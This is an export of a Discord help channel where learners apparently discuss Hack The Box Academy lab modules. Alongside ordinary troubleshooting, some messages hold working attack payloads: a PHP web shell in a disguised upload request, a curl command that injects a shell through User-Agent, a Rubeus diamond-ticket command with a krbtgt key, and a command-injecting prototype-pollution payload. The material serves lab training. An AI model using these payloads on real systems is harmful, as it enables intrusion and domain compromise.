#modules

1 messages · Page 437 of 1

cloud urchin
#

That is not right, you need to spawn the target and scan the target's IP.

#

You don't scan the IP range of your VPN's subnet, the target is on another subnet

fervent iris
median kestrel
#

You don't want the password. You want the admin key. Keep trying to enumerate that from the LLM

storm lagoon
#

Hi, in the "API ATTACKS" module (HTB ACADEMY), "Broken Object Property Level Authorization" section, I need help with the last question:
"Exploit another Mass Assignment vulnerability and submit the flag."
I know the hint gives you two endpoints: "Focus on the POST /api/v1/customers/orders and /api/v1/customers/orders/items endpoints." But I don't see how those two endpoints can help me. I think I'm missing more. Any suggestions?

fathom pendant
#

the question asks: Based on the last result... (this is referring to from the reading)

#

as a general tip of advice; if there is no target to spawn: the context is in the reading

#

the RCVD line is what would key you in

fervent iris
fathom pendant
#

yeah scanning anything was not required

fervent iris
#

yep, but still didn't satify my curiosity on why weren't the results consistent

fathom pendant
#

wdym "results not consistent?"

fervent iris
fathom pendant
#

if you're scanning your own network it's likely there's some other stuff in play that's not responding in a timely manner

#

or a device may have connected to the network i.e. someone turned on a computer, a tv was turned on, etc.

fervent iris
fathom pendant
#

but scanning a home network is in general not gonna be as consistent as a corporate network

fervent iris
#

so i'm very sure all devices were online

fathom pendant
#

i.e. Windows doesn't allow ICMP discovery by default

#

as far as why a random amount of devices additionally discovered: did you log in to your router and check the devices that are assigned?

fervent iris
fathom pendant
#

i wouldn't think too hard about it tbh; it works in most other instances you'll use it ¯_(ツ)_/¯

fervent iris
# fervent iris yes

i have 6 devices that are always online, i can ping all of them using ping command, but not always discovered using nmap

fathom pendant
#

you'll get yourself too caught up on this to move forward with learning

fathom pendant
#

¯_(ツ)_/¯

#

i.e. timed out

fervent iris
fathom pendant
#

the retries is for port discovery, not for Echo Requests

fathom pendant
fervent iris
fathom pendant
#

RTD - Read The Docs

#

:D

#

(or the more rude, RTFM - Read The Fuckingancy Manual)

fervent iris
#

its so overwhelming at first with all of the options

#

so am i supposed to assume that the results are inconsistent due to being a local network? and this is not the regular case in real world corporate networks?

gray yacht
fathom pendant
#

Let's try not to spoil content

storm lagoon
#

Ok then, I'm having trouble with the second endpoint that provides the clue, but I can't find the necessary fields to fill them out. Is there any other endpoint you suggest checking to join?

#

Because the final 2 points the clue gives me are not enough, and I've even checked the roles, but I feel like I'm forgetting something.

gray yacht
inland shoal
#

hey guys, why are these 2 tabs not redirecting me to the pages?

normal sand
inland shoal
#

huh weird 🤔

normal sand
#

I'm getting the drop-down menu.

#

@inland shoal might wanna try clearing your cache/logging out and logging back in, the standard stuff. If you still can't, just try another browser I guess xD 😂

inland shoal
#

yep trying to relogin 😂 the classic

#

bro tf my logout is broken too LMAO

normal sand
inland shoal
#

nope did not work, gonna try it tomorrow ig

normal sand
#

I was able to logout tho, welp, now I gotta log back in 😂

inland shoal
#

ok the stuff worked on my firefox, definitely Brave going nuts jn

#

thanks for the help at least @normal sand 🔥

normal sand
haughty fiber
#

?

fathom pendant
#

the module teaches you how to utilize pivots iirc, you don't need to necessarily do the pivoting module; as far as the scanning, proxychains sucks most of the time

haughty fiber
grizzled schooner
#

Speaking of this issue ^ any idea how to transfer a payload to windows machine for Socat Bind Shell Redirection?

haughty fiber
hollow kernel
#

Hi i need help in shells web php

#

Shell web app module

#

Y dont find user and password of rconfig server

long igloo
#

i literally feel like it's gambling now, I || sent it to burp repeater and spam click until the response size is bigger than 808 but spent last 5 mins like that and it's not working ||

blazing loom
#

Working on the "File Transfers" in the "Windows File Transfer Methods" section. It has a bit telling us to use SMB to upload files from our target to our attack machine. First I tried this on the PwnBox. However WebDav needs to use port 80 and doesn't support using other ports per their docs. The PwnBox is already using port 80. So then I tried using my own VM. I was able to download and start WebDav on port 80 on my VM. On the target (Windows) machine I am able to open firefox and navigate to my attack box IP and see all the files. So it looks like WebDav is running correctly. However when I try to connect to it via the CLI I get the following:

C:\Users\htb-student>dir \\10.10.15.119\DavWWWRoot
The network path was not found.

C:\Users\htb-student>dir \\10.10.15.119\Downloads
The network path was not found.

C:\Users\htb-student>dir \\10.10.15.119
The filename, directory name, or volume label syntax is incorrect.

C:\Users\htb-student>dir \\10.10.15.119\
The specified path is invalid.

If I could use the web UI to upload I would, but that doesn't seem possible. Looks like you can't use iwr either to upload.

The command that the lesson suggests is:

copy C:\path\to\file \\10.10.15.119\DavWWWRoot\
copy C:\path\to\file \\10.10.15.119\Downloads\

Any pointers as to what is going wrong?

fathom pendant
blazing loom
#

Lol, noted. Also I have noticed that iwr to the internet is basically shut down from the CLI. I can iwr to my VM.... but not to github. So maybe the VM just doesn't allow it.... Seems dumb to have the VM attached to this lesson not allow replicating the commands in the lesson though.....

dense spear
#

Probably something has changed, but there is no .viminfo file in the other users' directories.

polar raven
fathom pendant
blazing loom
fathom pendant
#

they are on a segregated network, generally

#

and the ones on docker containers are also heavily limited

glacial lava
#

Running into an Segmentation fault (core dumped) on AEN, if anyone is able to provide more assistance I can share more.

UPDATE: Figured out the issue

blazing loom
#

There is also a question in the next section:

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run `hasher <extracted file>` from the command line. Submit the generated hash as your answer.

But once you upload the file, the unzip command is not found on the target machine and you can't install it.... which makes it hard to do. I eventually used a python module to unzip it....

cloud urchin
#

gunzip?

#

or unzip it before transfer?

blazing loom
#

gunzip doesn't work on zip files if unzip isn't first installed on the machine. And yes you could unzip before transferring it. You could run hasher on it and not transfer it at all as well. But the question clearly says to (1) transfer, then (2) extract, then (3) run hasher.

dapper mason
#

guys can anyone lend a hand - Using Web Proxies
Page 10
Burp Intruder
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. ive legit tried as many word lists ... the only thing coming back with a 200 OK is index.html but i dont where i would find the flag, ive checked page source and it shows nothing what am i missing here ?

cloud urchin
#

it's your username or real name, whichever you choose

dusty mauve
dense spear
#

Are there any people who can give advice on completing the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' in the section https://academy.hackthebox.com/module/51/section/1592? I honestly don’t know what to do anymore...

proven gust
#

I want support for hackthebox

calm obsidian
#

How do you get added into ProLabs chat I bought it last week and stuck on a machine

#

Dante

silk lagoon
hollow kernel
#

Hi I need help in shel web app module
I don't find user and password of rconfig server

dull solar
#

a

#

Is there any way to get the roles?

#

'HackTheBox-Noob'

left lintel
left lintel
novel matrix
blissful elm
#

they just giving the example of this vuln or they give this example from teh lab exercise coz i can't find many of the example not in labs them in previous exercise

#

the exercise question is just a theory question can't even use it what learned on the labs just have to give the ans without using the content in practical

cloud urchin
#

@blissful elm Please take care not to post content from modules above tier 0

blissful elm
#

how would i ask about that

#

what if i had to show picture then where to ask

spiral spoke
#

Hi! In what module teach how to perform a SMB Relay Attack? It looks like AD Enum & Attacks is not the case

blissful elm
cloud urchin
faint hamlet
turbid cypress
#

Nn

silent sleet
#

HTB Module is not working, anyone know how to resolve without having internet access on the box?
Module: Automated Evil Twin Attacs -> Using Fluxion

spiral spoke
faint hamlet
spiral spoke
#

I guess is not touched in any module so far FeelsBadMan

spiral spoke
sharp siren
#

Anyone can help me with the skill assessment from Advanced SQL injection? I'm stuck

spiral spoke
#

what is the average time to complete a module? 1 week? 3 weeks for the longest modules? big_think

fathom pendant
#

it depends

#

not all modules are created equal (see: tiering) and not everyone has an easy time of applying the reading

spiral spoke
#

hmmm I see

rustic sage
#

What is checked first in the DNS resolution process when you enter a domain name into a browser? (Format: Two words)

#

need help on network foundation

fathom pendant
#

what section?

rustic sage
fathom pendant
rustic sage
fathom pendant
#

look closely at Step 2

winged galleon
#

Hey, im working on module/204/section/2230 the LDAP - Data Exfiltration & Blind Exploitation question - i cant get the wildcard to work at all when prefixed with a character (e.g. "a*") - am i able to get a hint? is the password not able to be exfiltrated? even the provided htb-stdnt user and password which work, dont work when using the wildcard.

fathom pendant
#

module/n/section/y isn't helpful at all

#

just say the module name and section name

#

helps others figure at a glance if they've already done it

winged galleon
#

Alright, the module name is injection attacks 🙂

#

i did find the flag, but i dont understand why i cant find the passwords as well :/ why would * work, by A* doesnt when i know the password starts with A?

hexed oyster
#

Hey all, I'm struggling on 'Web Services & API Attacks" at the Skills Assessment. I'm having a hard time understanding how to form the SOAP call into a curl request. Does anyone have any suggestions on further reading that might help me better understand?

opal crater
#

what is this error while i scan with gobuster

opal crater
#

i think was due to hight concurrency

#

thank you its resolved

wild folio
#

Windows lateral movement. The last question. I have access via vnc but I can't find the final path to the DC? Any help?

#

On the final skill assessment

last torrent
#

Hi everyone, I am working on the Web Attacks, doing Bypassing Basic Authentication. I am doing the following to get the methods supported by the server, but is not giving any result:

#

Is this normal behaviour?

hexed oyster
#

My hypothesis is that page doesn't have anything defined to return for Options requests.

#

It might be that PHP is serving the page directly.

#

Just reading through that module: it even says that's what you're supposed to get.

last torrent
hexed oyster
last torrent
#

Thanks I got it. It was too obvious for me 🙂

analog carbon
analog carbon
fathom pendant
#

so, the best way to get help for modules you're working on is:

  • Module Name
  • Section Name
  • Question you're struggling with
  • Generally what you've tried (while avoiding spoilers, i.e. logged in as j* and couldn't find anything)
raw arrow
#

Hi everyone, I just managed to create a fairly well-made pipeline that solves the third question of the Filter Contents section in the Linux Fundamentals module:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the https://www.inlanefreight.com/ website and filter all unique paths (https://www.inlanefreight.com/directory or /another/directory) of that domain. Submit the number of these paths as the answer."
My solution:

curl -s https://www.inlanefreight.com/ | grep -Eo "(https?://)?(www.)?inlanefreight.com[^"?<#%']+" | sort -u | wc -l

I'm wondering if one of you more experienced folks could take a look and let me know if there's a better way (like a more efficient regex) to solve it, or if there are any edge cases where my regex might fail that I haven’t considered?

fervent iris
#

in Network Enumeration with nmap Module, Host and Port Scanning section https://academy.hackthebox.com/module/19/section/102.

i spawned the target for testing with the IP 10.129.45.245, i can access the target using the url http://10.129.45.245/.

problem:
i can't ping the target IP (doesn't exist), nor discover its ports using nmap 10.129.45.245 -sV, nmap 10.129.45.245 -sV -Pn. the results are always (filtered) for all of the first 1000 ports.
what am i missing here?

fathom pendant
#

wait i didn't see where you have the http access

#

do you have the vpn and the pwnbox running at the same time?

fervent iris
fathom pendant
#

since it's asking for TCP -- -sT

brittle vortex
fervent iris
hexed kestrel
#

Hey! I need some help with File Upload Attacks > Type Filters

the Question at the bottom is the following:
" The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" "

I have achieved successful file upload, and the page references the uploaded file after refreshing, but if I then go the referenced path it returns a 404.

for extra info: this is the request that I used:

||POST /upload.php HTTP/1.1
Host: 94.237.50.221:55446
Content-Length: 244
X-Requested-With: XMLHttpRequest
Accept-Language: en-GB,en;q=0.9
Accept: /
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLFRXiJEqnwAojr3P
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://94.237.50.221:55446
Referer: http://94.237.50.221:55446/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryLFRXiJEqnwAojr3P
Content-Disposition: form-data; name="uploadFile"; filename="simplewebshell.phtml%00.gif"
Content-Type: image/gif

GIF8
<?php system($_REQUEST[cmd]); ?>
------WebKitFormBoundaryLFRXiJEqnwAojr3P--
||

This returned:

HTTP/1.1 200 OK
Date: Thu, 24 Jul 2025 10:24:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

File successfully uploaded

what am I doing wrong exactly? Why can I not go to this file after succesful upload?

#

I'm mainly confused why the upload is a success but then the file does not exist

fathom pendant
fathom pendant
hexed kestrel
#

Alright, I'll give some others a try

hexed kestrel
fervent iris
fathom pendant
fervent iris
fathom pendant
#

if you change vpn regions and it still doesn't scan properly, reach out to support

strong sorrel
#

hey i have doubt from the para in the module
https://academy.hackthebox.com/module/112/section/1069

the module says :
Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. Based on the country, company, etc., authoritative nameservers provide answers to recursive DNS nameservers, assisting in finding the specific web server(s).

That paragraph wrongly said:

“If an authoritative name server cannot answer a query, the root server takes over…”

Actually, root servers come first, not later.
The correct order is:

Recursive Resolver → Root → TLD → Authoritative → Final IP
if im not wrong so how do i understand this ?

fathom pendant
hexed kestrel
#

Okay I finally found an extension that actually works!

@fathom pendant do you mind explaining (or linking me a resource) why nullbyte payloads suck? I'm not very familiar so would love to know :)

fathom pendant
hexed kestrel
#

alright fair enough :p

#

thanks!

brittle vortex
strong sorrel
#

Anyone from the gulf? I'm from bahrain and I want a study partner 😩

dense spear
#

Has anyone taken the course at https://academy.hackthebox.com/module/51/section/1592? I’ve been stuck on the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' for about a week now. Can someone give me a hint?

paper crag
#

Did you complete this? Been trying for an age now...had various flags out but none of them are correct...

echo roost
#

Intro to C2 Operations with Sliver - The Domain Controller Compromise section I can not a diamond ticket to work. Here is the section:

Diamond Ticket

A diamond ticket is also a TGT that can be used to impersonate any user and access any service in the domain. A golden ticket is signed and encrypted by krbtgt's credential, while a diamond ticket is made by modifying a legitimate TGT issued by the domain controller. After requesting a legitimate TGT, the modification can be done by decrypting the TGT with krbtgt's credential, changing specific fields, and encrypting it.

We supplied the target user carrot, carrot's RID, RID of the group "Domain Admins", and krbtgt's AES256.
#

Here is the command:

sliver (http-beacon) > execute-assembly /home/htb-ac-1008/Rubeus.exe diamond /tgtdeleg /ticketuser:carrot /ticketuserid:1114 /group:512 /krbkey:f2a363997e7539b83637c12d872600a2b4c2727f2ebd35229d33dd85bdc11ed8 /nowrap
#

I obviously change the path to Rubeus.exe to match my machine

#

From the Hacker recipe website:
There seems to be some flags missing in the command from the module based on the example here. I know you don't need all the flags but I can't get this to work at all even using all the command flags.

molten current
#

Yo! What’s up guys? 💪
Just dropped into this server like a protein shake in a blenderready to mix it up! I’m here to grow muscle, master skills, and maybe even unlock a few life achievements along the way. Whether it’s lifting heavy, moving smart, or just figuring out how to do one clean pull-up without questioning my existence I'm down for the grind.
Not here to be perfect just better than yesterday. So if you’ve got tips, routines, memes, or just good vibes, throw ‘em my way. Let’s train hard, laugh harder, and level up together.

glacial lava
#

Working on Attacking Enterprise Network, using my own VM and connecting. Trying to find a way to make the connection more consistent, it takes about 5 min to tunnel through the foothold device and load anything in browswr

vernal fulcrum
#

I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab

#

What I'm missing anyone can point it ?? i found open UDP port 137 but after that I stuck

strong sorrel
#

try scanning through DNS port

full echo
# vernal fulcrum What I'm missing anyone can point it ?? i found open UDP port 137 but after that...

This is the hint that said "Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data."

-> Because this service is critical so it's very likely that this service only accepts connection from certain port. So doing typical scanning will get blocked because those ports are ephemeral ports. Look at this section again "https://academy.hackthebox.com/module/19/section/106" to see what else could you do

Hope this would shed some light on.

eager spindle
#

https://academy.hackthebox.com/module/112/section/1069 I need help with the question: What is the FQDN of the host where the last octet ends with "x.x.x.203"? I used DIG - AXFR Zone Transfer and DIG - AXFR Zone Transfer - Internal, as well as brute-forcing inlanefreight.htb (which only found three domains), but still couldn't find x.x.x.203

#

I used desenum, but still only had
ns.inlanefreight.htb.
mail1.inlanefreight.htb.
app.inlanefreight.htb.
I also thought about blasting the vpn.internal.inlanefreight.htb behind, but I didn't find anything

green shuttle
#

when i download the fatty-server.jar from attacking web applications vulnerabilities in thick client Applications section i get invalid or corrupt jar file anyone knows why

#

this is from attacking common applications module

full echo
echo roost
dusty skiff
#

I made this toolkit to help with bug bounty recon, who knows it might be useful

green shuttle
#

i followed the steps and downlaoded same as in the module

waxen totem
eager spindle
trail slate
#

hi

vernal fulcrum
full echo
eager spindle
full echo
eager spindle
river grove
#

Im stuck on RCE part of advanced sql injections. Installing postgresql-server-dev-13 doesnt work anymore. Did anyone manage to go around this? 🙏

echo roost
gray yacht
echo roost
#

funny that it's the only example in that section that uses Sliver besides the PTT part in the beginning.

gray yacht
echo roost
#

from Sliver

gray yacht
echo roost
#

Yeah I just don't know why it's even in the training if it doesn't work in the lab

gray yacht
echo roost
limber oasis
#

Detecting Windows Attacks with Splunk in the Detecting Pass-the-Hash section. Even after following the query in the steps and getting exactly where HTB show you. It asks you to put the answer of the ComputerName. No matter what I try, it still says it's incorrect?? Anyone know what is going wrong?

gritty bay
#

hi anyone i can dm for ""Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory."

indigo roost
paper crag
lofty stump
#

Great!

delicate adder
#

Hi, I'm doing the password cracking module and I've been blocked from cracking protected file for 3/4 days. Can you give me some advice?

#

I'm not very experienced in this world that I've just started learning seriously. Should I start with something easier?

#

I try to see what was shown to me in the module section and I try to do what it tells me and to think about what I should do to make you understand where to crack a zip file. I tried to do what the module told me and do searches with Google but every time I can't finish the module.

rustic sage
#

I cant visit them for some reason

#

i tried visiting "http://localhost:5901" didn't work, included the ip in hosts file also.
Network Foundations, skills assessment

edgy ember
#

Anyone found any workaround for the constant rpc error: code = Unknown desc = implant timeout in the sliver module?

delicate adder
#

I can't crack the zip file. I try to use all the material provided by hack the box but every time it doesn't work. I tried to extract the file with unzip to see the file extensions and other ways to crack it but it doesn't work.

rustic sage
#

yeah i did so dw

delicate adder
cloud urchin
#

@uneven obsidian Please do not reveal content from modules above tier 0

uneven obsidian
#

oops sorry

delicate adder
#

yes i used unzip and the name of file

split falcon
#

Hello guys dl you have roadmap to start cyber security+ good resource

uneven obsidian
edgy ember
delicate adder
#

this is what he tells me

cloud urchin
delicate adder
#

ok

sage oyster
#

Did someone get trouble with this last question of AI Foundamentals- Skill assessment ?? Thanks

What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing? 
#

thansk for help

uneven obsidian
#

someome can assist me with the AEN on a private chat? i found something that i am pretty sure needs to be working

sage oyster
#

I dont know if i can write here the answare I have in mind, but is the only i have in mind

uneven obsidian
#

Someone can assist me please in AEN module, section Web Enumeration & Exploitation ?

delicate adder
#

I don't even understand the reason for the output

strange pivot
#

hmm try maybe hashcat -a 3 -m 9600 with it?

vestal ore
#

.

autumn barn
#

Hey

#

I'm new

strange pivot
#

hi new, im sep

autumn barn
#

@strange pivot Hi

#

@sterile hawk Bro hlo

strange pivot
#

not allowed

wet kiln
#

Really??

strange pivot
#

thats not very nice

sterile hawk
#

This server isn't for discussing illegal activity

gray yacht
# autumn barn I'm new

Welcome to the server. Read through #welcome and follow the provided steps and read the #rules. With that being said, this isn't the server to be asking for help on hacking a friend or any other illegal activity.

delicate adder
#

this is the outpout

gray yacht
#

If running it through hashcat you are going to need to remove the Confidential.xlsx: from the beginning of the hash and also add a wordlist to your command. You can always compare the hash that hashcat expects here: https://hashcat.net/wiki/doku.php?id=example_hashes

delicate adder
#

ok thanks

silent kindle
#

can I get some help pls? still stuck on this ty

gray yacht
gray yacht
# delicate adder ok thanks

I also deleted your screenshot due to spoiling content over Tier0, but you should be good with the hashcat stuff now. If not let me know.

silent kindle
gray yacht
silent kindle
wide olive
#

Anyone can give me a hand on the Credential Hunting in Network Shares Module?
Sadly its not possible to connect via RDP or WINRM to the target machine and its the last Answer missing :/

gray yacht
gray yacht
wide olive
#

Normally i should, but i am still not 😂

However either the Pwnbox or my Client are not able to dump stuff via nxc. Also it's not possible to connect via winrm or RDP against the Machine.

Crackmap or nxc are able to authenticate and show the accessible shares but after that there is a dead end and the machine crashes. The module should probably be reworked

gray yacht
wild folio
#

Windows Lateral Movement
Skill Assessment
Last question getting connect to DC
Tried RDP with alternate port to DC with n* and pth. Also tried r*
Tried psexec.py with pth
WinRM not available
What am I missing here?

gray yacht
wild folio
silver abyss
#

I'm doing easy assessment from Attacking Common Services, I tried:

  • nmap
  • login to ftp with anonymous
  • look through the website
  • scan users in smtp with list from this module, and with xato-net-10... wordlist
    So far I can't get any move forward, any tips? I'm probably missing something simple
gray yacht
silver abyss
#

I tried every mode, but only after some time I found solution.
I terminated machine and spin a new one. Use command which I used before only changed IP and now it is working, ehh

proven silo
#

Hi, based on your experience, is it better to focus on a single module and learn it in depth, or to get the basics of several modules and practice on VM?

fathom pendant
#

And even some of the more in-depth stuff exists in higher tier modules

tawdry lynx
#

Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

does anyone know the answer to this, I can't figure this out to save my life.

#

I can't take the cdsa untill get this question right

cloud urchin
#

best to say which module and section you're on too

dense jacinth
cloud urchin
#

Make sure there are no whitespaces

#

try manually typing it

fathom pendant
#

Also mods arent staff

dense jacinth
dense jacinth
cloud urchin
#

You can DM me what answer you have and I'll tell you if it's correct or not

#

i just did this like a week ago so it's unlikely that it's broken somehow

dense jacinth
#

nvm

#

found it, that was my bad

#

thanks for the support anyway prayge

tawdry lynx
#

Introduction to Threat Hunting & Hunting With Elastic

Page 5

Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

can I please get some help with this

indigo roost
dense spear
#

Has anyone encountered the issue of this command hanging indefinitely?
"grep -r 'HTB{' / 2>/dev/null"

heady hare
#

Is there someone working on this module: Skills Assessment - Password Attacks? I got a foot on the DMZ01 host, but unfortunately, there are no tools there. I have tried all I know to elevate privileges with no luck. I will appreciate a hint.

heady hare
#

Thanks! @fathom pendant I am working on it now!

naive parrot
#

dns is killing me

#

can't understand anything

#

stuck on the first question

candid vine
#

try using dig ns inlanefreight.htb @127.0.0.1 command in the "DIG - Ns Query" section

#

Or use the "Subdomain Brute Forcing" technique

naive parrot
#

it's just I don't know what I do

#

dig is used to enumerate stuff

#

and I get some sub domains when I use it

#

but from that I don't understand what's the second step

candid vine
#

when you use the command "dig ns inlanefreight.htb @10.129.14.128" what you can see in the ;; ADDITIONAL SECTION:? sus

winter glade
#

I have run into some issues with Sqlmap essentials module.

I’ve finished all the cases and into the shell questions. I got the first flag with cat flag.txt and that’s the only flag I can find.
In the shell I find the flag… but it’s the same flag as the previous question

indigo roost
naive parrot
#

btw that's also the thing I don't understand what all of this means

#

question answer sections

#

oh sorry

candid vine
naive parrot
#

alright

#

I understand

#

what's the platinium badge you have ?

#

is it because you play season machines ?

#

nice

#

are they really hard ?

rustic sage
#

need help, answer wont work.
Linux Fundamentals
Working with Files and Directories

#

thats what i done but apparently the dates isnt correct

#

i mean the filename, it's rly dumb

polar raven
fathom pendant
#

Run it from the context of the other user

#

Aka run it from the terminal

#

@winter glade your screencap included a flag/answer.

winter glade
#

I am stumped on the second question. When i do the directions it is saying... that is the only flag that I can find. The same as the first answer

#

im able to get into the shell and everything no big deal... then it leads me to the databases and one of the files is flag.txt

however, when i use the cat comand to look at the contents in the file - it returns that same flag for the second answer

#

This is not the right flag...

I have tried to recall all the folders and there is not a flag anywhere

cloud urchin
winter glade
#

My apologies... I am not sure how to provide intext about what im doing to get help

cloud urchin
#

You can say the module, section, and question you're on. Anyone who has completed the module and who can help has done it and doesn't need pictures or details, they know the attack path etc. You can say what you've tried (without revealing content etc) and take it to DM's if you really feel like you need to reveal something more.

winter glade
#

Sounds good. Thank you. My apologies, i didnt mean to reveal anything. That is on me. wont happen again

#

I am looking for some help on the SQLMaps essentials - the OS Exploration question: Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

Please DM me if you can help me.

tribal lark
#

I think I am having a issue with password cracking module cracking protected files the file won’t crack tried a few wordlists

waxen totem
tribal lark
#

Got it tricked me

#

I don’t want to spoil how to fix it

full echo
rustic sage
#

it makes no sense there's 2?

#

ok i see why, i didnt do it in their VM

tribal lark
#

Think you need to ssh in

eager spindle
#

https://academy.hackthebox.com/module/112/section/1072 Can you help me? Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. Hint: On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times. I used smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt, but it did not return any results. Then I use nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.timeout=10 to get | smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
I use these usernames to verify with VRFY in the smtp service, and only root returns 252.2.0.0 root. But the answer submitted by root is wrong. I have no clue, can you help me?

alpine ingot
#

I'm so glad i found this.... The fact that you said this made me hate myself less lmao.

#

I was so close to passing it, i was at the ../logs part, 4 hours in, just gave up because i was pissed that the jar wouldnt update 😐

vernal edge
#

Hi

#

I'am brazilian

storm elk
#

Hello Brazilian. Please read #welcome and #rules it will explain how to get verified

vernal edge
#

i need some help because I'm starting today

storm elk
#

Follow the instructions 👆 👇

compact patrolBOT
storm elk
#

If you’re stuck on a module, this channel is the place to be

vernal edge
#

an instance of my HTB does not open eat now and it is not opening for me can complete the module

#

i need to find the flavor of the Linux operating system by running cat/etc/issue

storm elk
#

What do you mean by not opening?

vernal edge
#

the instance does not open the Linux system for me can run the module

storm elk
#

You’ll have to connect yourself

#

Via pwnbox or your own OS

vernal edge
#

isn't that where I can send a picture to show what's going on?

storm elk
#

Step 1: Follow instructions

arctic karma
#

Where could I get help about an issue with a not working module?

storm elk
#

Step 2: get permission to share images

storm elk
storm elk
#

#boxes or if it’s a recent one, there might be a dedicated channel

arctic karma
#

Its about a module I messed up there haha

vernal edge
#

i am using translator because my English is weak yet so it is difficult to understand how I do to speak in general

arctic karma
#

RDP will not work and I have tried it over the course of multiple days with no success

cloud urchin
minor hinge
#

Hi guys,
I think in the module "SQL Injection Fundamentals" the page "Subverting Query Logic" there is a mistake in the explanation of the Injection regarding AND, OR precedence:

"
The AND operator will be evaluated first, and it will return false. Then, the OR operator would be evaluated, and if either of the statements is true, it would return true. Since 1=1 always returns true, this query will return true, and it will grant us access.
"
That is not true I think, because 1=1 is true but will evaluate to false since it is connected with the "AND" password=something. I tested that also with username tom and toms and for tom i get success but for toms not, since it evaluates to non existing user → FALSE
Can someone check this. I hope this is the right channel to pinpoint such things

waxen totem
noble sand
#

Hello everyone,

I'm currently stuck on a Hack The Box exercise and could use some assistance. I'm working on the "Wi-Fi Evil Twin Attacks" module, specifically the Skills Assessment section (https://academy.hackthebox.com/module/291/section/3287), and I'm on the very last question: "What credentials are obtained from the Wi-Fi network 'PulseGrid-ENT' (format: username:password)?"

From the provided information and the network type (enterprise as seen in the screenshot), I understand that I should likely be using EAPHammer to set up an evil twin access point to capture credentials, which I anticipate would be transmitted in cleartext via GTC.

However, my main problem is that I'm unable to find any connected clients on the "PulseGrid-ENT" network, even after extensive monitoring. This prevents me from capturing the necessary certificate that EAPHammer needs to create the evil twin. I see other devices on other networks, but not on this specific "PulseGrid-ENT" network.

Has anyone encountered this issue before, or does anyone have any pointers on how to proceed? Any help or guidance would be greatly appreciated!

Thanks in advance!

round marten
#

It was a long run but it's cleared. Thanks to the people that helped here.

last musk
#

Stuck on Windows Privilege Escalation on HTB acdemy in the Pillaging section I got the mozilla cookie for slack but doesnt work?

waxen totem
gloomy grail
#

Hello guys, I am doing the whitebox attacks module and I am stucked on remote code execution section.

I am doing all the steps described and when I send the payload
{"__proto__":{"deviceIP":"127.0.0.1; whoami"}} to /update endpoint, I don't pollute the parameter as text is telling to me.

long igloo
#

Trying to use CVE-2021-3156 as the module explains, but popping this error: $ ./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./sudo-hax-me-a-sandwich)

oak vale
#

Hello

limber river
oak vale
#

How to talk in general

long igloo
#

Yeah, I had to compile it on my attack host, since target host doesn't have gcc to compile it, that's the issue

#

Any ideas?

limber river
#

iirc there was a flag called -static

#

wait i'll check

long igloo
#

I mean it doesn't make any sense that you explain how to compile it one way, but the target host for the exercise is not compatible and you don't explain any workaround on the module

limber river
waxen totem
limber river
#

ig this -static might work @long igloo

long igloo
limber river
#

for the binay (hax me a sandwich)

#

not sure it gonna work

long igloo
#

not working for me lol

#

this is stressful, and looking into the discord search bar shows me other people with the exact same error ffs

waxen totem
naive quiver
#

isn't nessus already installed in the pwnbox ?

fathom pendant
#

No

#

This is because it requires a license to activate [there's a free one and a paid one]

naive quiver
# fathom pendant No

Thanks for sharing that. I was going through the Vulnerability Assessment module, and for the Skill Check lab, I initially thought it was installed locally, so I tried to log in using localhost

fathom pendant
naive quiver
languid ridge
#

Hi, I'm kind of new to windows and I was wondering what are the prerequisites for the following command to work ?
psexec.py <USER>:'<PASS>'@<IP>
From what I understood, it needs the ADMIN$ share for the SMB protocol to be writeable by the user I try to log in as, am I right ?

languid ridge
#

Perfect thanks !

languid ridge
# waxen totem That's correct

Is there any other tool that enables us to get RCE on a windows machine through SMB if the ADMIN$ share is not writeable ?

waxen totem
small basin
#

Any idea why everything works when I inject using curl but I get a 500 error when I inject with Burp?

curl -s "http://94.237.48.12:43356/index.php" -H "User-Agent: injected<?php system(\$_GET['cmd']); ?>"

rustic sage
#

Can any1 pls help me with this question?

waxen totem
small basin
waxen totem
lunar briar
#

How i join to team in ctf ?

lunar briar
waxen totem
gray yacht
tall saffron
#

hi!!! can you look at my smuggling request? because it works when i look myself, my cookie is logged (with my normal rerquest) but it seems the admin never hit the page.

small basin
wary wren
#

Can anyone help me in this question
